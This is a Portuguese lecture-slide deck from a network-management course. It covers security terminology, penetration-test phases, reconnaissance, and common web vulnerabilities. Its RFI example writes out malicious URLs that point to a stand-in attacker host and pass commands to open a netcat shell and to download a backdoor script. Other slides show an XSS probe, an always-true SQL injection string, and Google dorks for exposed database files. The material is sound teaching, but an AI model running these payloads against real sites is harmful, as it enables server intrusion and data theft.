aula8

Gerência de Redes de Computadores


Prof. Jordan M. Bonagura

Definição: Segurança

Segundo o dicionário da Wikipédia, o termo segurança significa:

1. Condição ou estado de estar seguro ou protegido.

2. Capacidade de manter seguro.

3. Proteção contra a fuga ou escape.

4. Profissional ou serviço responsável pela guarda e proteção de algo.

5. Confiança em si mesmo.

• Apresentação

• Definições

• Dados Estatísticos

• Mecanismos de Seg.

• Taxonomia do Ataque

• Aplicação Web

• Vulnerabilidades




Definição: Informação

Segundo a norma ISO 27002, ”A informação é um ativo que, como qualquer outro

ativo importante, é essencial para os negócios da empresa e conseqüentemente

necessita ser adequadamente protegida”.

http://www.abntcatalogo.com.br/norma.aspx?ID=1532

• Apresentação

• Definições




• Aplicação Web





http://www.abntnet.com.br/fdetail.aspx?FonteID=37529

http://www.abntnet.com.br/fdetail.aspx?FonteID=37529

Definição: Segurança da Informação

Portanto, podemos concluir que a Segurança da Informação, está relacionada com a

proteção de um conjunto de informação, no sentido de preservar o valor que

estes possuem para um indivíduo ou para uma organização.

• Apresentação

• Definições




• Aplicação Web





Propriedades da Segurança da Informação

São características básicas da segurança da informação os atributos de

Confidencialidade, Integridade e Disponibilidade, não estando está segurança

restrita somente a sistemas computacionais, informações eletrônicas ou sistemas de

armazenamento.

Este conceito se aplica a todos os aspectos de proteção de informações e dados,

incluindo os sistemas em si.

• Apresentação

• Definições




• Aplicação Web






CONFIDENCIALIDADE - propriedade que limita o acesso a informação tão somente

às entidades legítimas, ou seja, àquelas autorizadas pelo proprietário da informação.

INTEGRIDADE - propriedade que garante que a informação manipulada mantenha

todas as características originais estabelecidas pelo proprietário da informação,

incluindo controle de mudanças e a garantia do seu ciclo de vida.

DISPONIBILIDADE - propriedade que garante que a informação esteja sempre

disponível para o uso legítimo, ou seja, por aqueles utilizadores autorizados pelo

proprietário da informação.

• Apresentação

• Definições




• Aplicação Web






O nível de segurança desejado está diretamente relacionado a uma política de

segurança que é seguida pela organização, para garantir que uma vez estabelecidos

os princípios, aquele nível desejado seja perseguido e mantido.

PARADIGMA:

• Apresentação

• Definições




• Aplicação Web





Terminologias: Segurança

VULNERABILIDADE - Fragilidade de software, hardware ou procedimento que

pode fornecer a um atacante a maneira para entrar em um computador ou rede e

ganhar acesso às informações do ambiente.

AMEAÇA - Agente ou ação, espontâneo ou proposital, que aproveita das vulnerabilidades

de um ambiente para conseguir seu intento.

RISCO – Calculado considerando o nível de impacto e a probabilidade de uma ameaça

ATAQUE – Incidência da ameaça sobre a vulnerabilidade.

EXPLOIT – Programa capaz de explorar uma vulnerabilidade.

• Apresentação

• Definições




• Aplicação Web





Terminologias: Segurança

Exemplo de vulnerabilidade:

“Uso de protocolos inseguros para transmissão dos dados.”

Exemplo de ameaça:

“Um funcionário insatisfeito com a empresa.”

Exemplo de ataque:

“O usuário insatisfeito capturando o tráfego de rede.”

• Apresentação

• Definições




• Aplicação Web





Dados Estatísticos

De acordo com a pesquisa elaborada pelo Computer Security Institute em 2008, mais

de 70% dos ataques partem de utilizadores legítimos de sistemas de informação, ou

seja, os famosos “Insiders”.

Fonte: http://www.gocsi.com/

Interno (70% dos ataques) Externo

Funcionários Insatisfeitos;

Funcionários Despreparados;

Espionagem

Crackers

Concorrentes;

Espionagem.

• Apresentação

• Definições




• Aplicação Web





• Apresentação

• Definições




• Aplicação Web





Dados Estatísticos – Abril a Junho de 2009

http://www.cert.br/

http://www.honeypots-alliance.org.br/stats/

Incidentes em que ocorre uma tentativa de acesso

Varreduras em redes.

Propagação de códigos automatizados

Desfiguração de páginas ou comprometimento servidores

Ataque bem sucedido

Ataque de negação de serviço

Outros tipos

• Apresentação

• Definições




• Aplicação Web





http://www.cert.br/




Dados Estatísticos – 1º Semestre de 2009

Breach Security Labs - http:// www.breach.com/resources/breach-security-labs/

• Apresentação

• Definições




• Aplicação Web





Mecanismos de Segurança

Controles Físicos - são barreiras que limitam o contato ou acesso direto a

informação, ou a infra-estrutura que a suporta.

Ex.:

Portas;

Trancas;

Paredes;

Blindagem;

Câmeras;

Guardas.

• Apresentação

• Definições




• Aplicação Web






Controles Lógicos - são barreiras que impedem ou limitam (controlam), de acordo

com os padrões pré estabelecidos, o acesso a informação.

Ex.:

Criptografia;

Firewall;

Anti Vírus;

IDS / IPS;

Anti Spam;

• Apresentação

• Definições




• Aplicação Web






Além de dispositivos de segurança, também existem diversos serviços relacionados a

segurança da informação.

Ex.:

Criação de Políticas de Segurança;

Hardening de Servidores;

Análise de Vulnerabilidades;

Teste de Intrusão (Pen Test);

Análise de Aplicações (Testes);

Treinamento de Colaboradores.

• Apresentação

• Definições




• Aplicação Web





Procedimentos de um Pen Test

Os procedimentos realizados por um profissional de Pen Test são muito similares aos

procedimentos realizados pelos Crackers, porém com diferentes éticas e intenções.

• Apresentação

• Definições




• Aplicação Web





1. Levantamento de Informações

Nesta fase emprega-se aproximadamente 90% do tempo gasto em uma análise

de segurança (Pen Test).

Nesta etapa, o principal objetivo do profissional é conseguir o maior número de

informações sobre o alvo, para somente então, começar a planejar a melhor

maneira de sua intrusão.

Quanto maior o tempo empregado nesta fase, maior a probabilidade de

sucesso na fase de acesso.

• Apresentação

• Definições




• Aplicação Web


Fonte: Certificação de Hacker Ético




1. Levantamento de Informações

Nesta fase procura-se conhecer:

Informações sobre a organização ou pessoa alvo;

Informações sobre os servidores da organização;

Informações sobre os funcionários da organização;

Informações sobre os amigos e pessoas chaves da organização;

Endereços de e-mail, telefones e nº de registro (crachá);

Sistemas e equipamentos utilizados (parcerias);

Qualquer outra informação relacionada com o negócio.

• Apresentação

• Definições




• Aplicação Web





2. Varreduras

Nesta etapa, o profissional se utiliza das informações descobertas na fase

anterior e as usa para examinar a rede de maneira direcionada, conduzindo

uma série de “buscas”, com a finalidade de obter as versões de sistemas e

serviços que possam ser explorados, ou seja, que possam estar vulneráveis.

Nesta fase procura-se conhecer:

Sistemas operacionais utilizados e suas versões;

Serviços utilizados e suas versões;

Existência de IDS/IPS, firewalls e outros controles de segurança.

• Apresentação

• Definições




• Aplicação Web





3. Ganhando Acesso

Nesta fase, é onde a invasão realmente ocorre.

Através das informações obtidas nas fases anteriores, fazem possíveis a descoberta

de vulnerabilidades que agora podem ser exploradas para obter acesso ao sistema.

• Apresentação

• Definições




• Aplicação Web





4. Mantendo Acesso e 5. Limpando Rastros

Estas duas fases são as que basicamente diferenciam os profissionais de Pen Test

dos Crackers, pois um profissional autorizado (pen test), não precisará manter

acesso ao equipamento, nem mesmo efetuar a limpeza de registros, uma vez que já

efetuou os serviços contratados e relatará todos os problemas diagnosticados ao seu

cliente.

Obs.: Porém, é de extrema importante que este profissional verifique tanto

possibilidade de criação de um ambiente para futuros acessos.

• Apresentação

• Definições




• Aplicação Web





Obtendo Informações

Obtendo Informações do Domínio

Ex.: Comando whois e/ou visita ao site http://www.registro.br

Neste momento conseguimos obter quais informações??

Nome e IP dos servidores DNS;

Nome do Responsável pelo domínio;

Datas de alteração e criação;

Usuário - E-mail;

CNPJ.

• Apresentação

• Definições




• Aplicação Web





Obtendo Informações • Apresentação

• Definições




• Aplicação Web


Obtendo Informações do Domínio





Detecção do Sistema Operacional

Ex.: Comando Ping (ICMP) / Simples conexão ftp / Ferramenta: sing/ xprobe2/hping

$ ping 192.168.200.254 PING 192.168.200.254 (192.168.200.254) 56(84) bytes of data. 64 bytes from 192.168.200.254: icmp_seq=1 ttl=64 time=0.229 ms --- 192.168.200.254 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 1999ms rtt min/avg/max/mdev = 0.191/0.220/0.240/0.021 ms $

• Apresentação

• Definições




• Aplicação Web






Detecção do Sistema Operacional

Ex.: Ping (ICMP)

Cyclades - Normalmente 30

Linux - Normalmente 64

Windows - Normalmente 128

Cisco - Normalmente 255

Linux + iptables - Normalmente 255

• Apresentação

• Definições




• Aplicação Web






Sites Antigos

Ex.: site http://www.archive.org

• Apresentação

• Definições




• Aplicação Web





• Apresentação

• Definições




• Aplicação Web

• Vulnerabilidades Vulnerabilidades em Aplicações Web

Jordan M. Bonagura

Data: 12/11/2009




Entendo a aplicação WEB

Aplicações web são programas que ficam em um servidor web e executam tarefas

para dar uma resposta ao usuário.

Webmails, web fóruns e blogs são bons exemplos de aplicações web.

Uma aplicação web utiliza uma arquitetura cliente/servidor.

Melhor exemplificando:

Com um navegador web, o cliente acessa o servidor onde a aplicação(página) está

armazenada (Web Server).

• Apresentação

• Definições




• Aplicação Web





Entendo a aplicação WEB

Com a exploração de uma aplicação web é possível ganhar acesso a informações

confidenciais.

Aplicações web são críticas para a segurança, pois usualmente elas estão

conectadas com uma base de dados que muitas vezes contém informações

sigilosas do negócio ou mesmo de seus clientes (dados financeiros,

senhas, etc).

• Apresentação

• Definições




• Aplicação Web





Principais Vulnerabilidades WEB;

Conteúdo




PHP Injection

Mais conhecida como Remote File Inclusion (RFI) ou Inclusão de arquivo remota,

essa falha permite que um usuário malicioso execute seu próprio arquivo PHP no

website vulnerável.

Exemplo de um arquivo (index.php) vulnerável:

include($page);

http://www.site.com.br/index.php?page=archive.php (Chamada Normal)




http://www.site.com.br/index.php?page=archive.php








PHP Injection

(Chamada Maliciosa)

http://www.site.com.br/index.php?page=http://www.host.atacante/arquivo.php

Dessa forma o atacante consegue inserir um arquivo que ele controla, podendo usar

funções maliciosas dentro desse arquivo, como por exemplo a função system(), que

será executada no servidor vulnerável, e conseqüentemente executará os comandos

que o atacante desejar.

Exemplo do arquivo PHP (arquivo.php) do atacante:

system($cmd);










PHP Injection

(Chamada Maliciosa)

http://www.site.com.br/index.php?page=http://www.host.atacante/arquivo.php&cm

d=nc –l –p 4141 –e /bin/sh


d=wget www.packetstormsecurity.com/bd.pl -O /tmp/bd.pl


d=ls




PHP Injection

Falhas dessa classe ocorrem simplesmente porque o programador não filtrou o

conteúdo que recebe de um usuário e envia para funções que executam comandos

no sistema, como por exemplo, a função system() do PHP.

Uma vez que um usuário malicioso consegue enviar caracteres de escape (; | > <) e

esses caracteres são enviados para a aplicação vulnerável, o atacante conseguirá

executar os comandos diretamente no servidor.




Cross-Site Scripting (XSS)

Cross-site scripting (XSS) é um tipo de vulnerabilidade de segurança encontrada em

aplicações web que permite inserção de códigos por usuários web maliciosos dentro

das páginas vistas por outros usuários.

Exemplos de código incluem HTML, Java Script e outros client-side scripts.

Uma das formas mais comum de explorar esse tipo de falha é inserir um formulário

web no site vulnerável para tentar roubar informações.





Outro ataque típico também visa roubar os dados do cookie do usuário, enviando as

informações para um servidor do atacante.

Exemplo de uma vulnerabilidade usando as Query Strings de uma página: http://site.com/default.aspx?parametro=<script>alert('Olá%20Teste!');</script>

Se obter a mensagem JavaScript “Olá Teste” significa uma falha de segurança.




http://dominio.com/default.aspx?parametro=<script>alert('Olá 4Linux!');</script








XSS também é amplamente usado para Phishing, na tentativa de dar mais valor a

informação fraudulenta que foi enviada para o alvo, pois o alvo verá uma fonte

confiável (site vulnerável).




SQL Injection

SQL Injection é um problema que ocorre quando o programa não filtra caracteres

especiais enviados pelo usuário antes de fazer a requisição para o banco de dados

enviando caracteres que serão interpretados pelo banco de dados.

SQL Injection é a vulnerabilidade mais comum em aplicações web.




SQL Injection

Analisando o trecho de código abaixo:

Select * from usuarios where username = „” + username + “‟ and password = „” +

password “‟;

Como ficaria a chamada no banco de dados se enviássemos no username e

password o conteúdo: „ or „1‟=„1 ?

Select * from usuarios where username = „‟ or „1‟=„1‟ and password = „‟ or „1‟=„1‟;

Como 1 é sempre igual a 1, teremos uma “verdade” e passaremos pela checagem.




Google Hacking

Google Hacking é a atividade de usar recursos de busca do site, visando atacar ou

melhor proteger as informações de uma empresa.

As informações disponíveis nos servidores web da empresa provavelmente estarão nas

bases de dados do Google.

Um servidor mal configurado pode expor diversas informações da empresa no Google.

Não é difícil conseguir acesso a arquivos de base de dados de sites através do Google.




Google Hacking

Exemplo: site:gov.br ext:sql




Google Hacking

Detectando sistemas que usando a porta 8080

inurl:8080 -intext:8080

Encontrando VNC

intitle:VNC inurl:5800 intitle:VNC ou intitle:"VNC Viewer for Java“

Encontrando Apache 1.3.20: "Apache/1.3.20 server at" intitle:index.of




Denial of Service (DoS)

De acordo com a definição do CERT (Computer Emergency Response Team), os

ataques DoS (Denial of Service), também denominados Ataques de Negação de

Serviços, consistem em tentativas de impedir usuários legítimos de utilizarem um

determinado serviço de um computador.

Para isso, são usadas técnicas que podem:

sobrecarregar uma rede a tal ponto em que os verdadeiros usuários dela não

consigam usá-la;

Fazer tantas requisições a um site até que este não consiga mais ser acessado;





É importante frisar que quando um computador/site sofre ataque DoS, ele não é

invadido, mas sim sobrecarregado.

Isso independe do sistema operacional utilizado.

Uma das formas de ataque mais conhecidas é a SYN Flooding, onde um computador

tenta estabelecer uma conexão com um servidor através de um sinal do TCP

conhecido por SYN (Synchronize).





Se o servidor atender o pedido de conexão, enviará ao computador solicitante um

sinal chamado ACK (Acknowledgement).

O problema é que em ataques desse tipo, o servidor não consegue responder a

todas as solicitações e então passa a recusar novos pedidos.

Outra forma de ataque comum é o Packet Storm, onde um computador faz

solicitações constantes para que uma máquina remota envie pacotes de respostas

ao solicitante.

A máquina fica tão sobrecarregada que não consegue executar suas funções.




Distributed Denial of Service (DDoS)

O DDoS, sigla para Distributed Denial of Service, é um ataque DoS ampliado, ou

seja, que utiliza até milhares de computadores para atacar um determinado alvo.

Esse é um dos tipos mais eficazes de ataques e já prejudicou sites conhecidos, tais

como os da CNN, Amazon, Yahoo, Microsoft e eBay.

Para que os ataques do tipo DDoS sejam bem-sucedidos, é necessário que se

tenha um número grande de computadores para fazerem parte do ataque. Uma das

melhores formas encontradas para se ter tantas máquinas, foi inserir programas de

ataque DDoS em vírus ou em softwares maliciosos.





Fonte: www.4linux.com.br





Como exemplo real de ataques DDoS ajudados por vírus, tem-se os casos das

pragas digitais Codered, Slammer e MyDoom.

Existem outros, mas estes são os que conseguiram os maiores ataques já realizado




Descuido

Navegando no site.

Ex.: www.kernel.org

Neste site conseguimos obter quais informações??

E-mails válidos;

Um endereço para acompanhar as estatísticas dos servidores;

Uma lista com tecnologias e fornecedores.




http://www.kernel.org/

Descuido

Listagem de Diretórios

Demonstração de campos e valores na barra de endereço

Arquivos Antigos / Backup

Extrações de Banco de Dados

Usuários e Senhas Padrões

Usuários e Senhas “fracas” (Brute Force)

Demonstração de Versões/Sistemas que estão sendo utilizados. (Apache / FTP /

Webmail)




aula8

Documents

como por exemplo

obtendo informaesobtendo informaes

segurana da informao

aplicao web vulnerabilidades

obtendo informaesdeteco

ou seja

suas verses

chamada maliciosa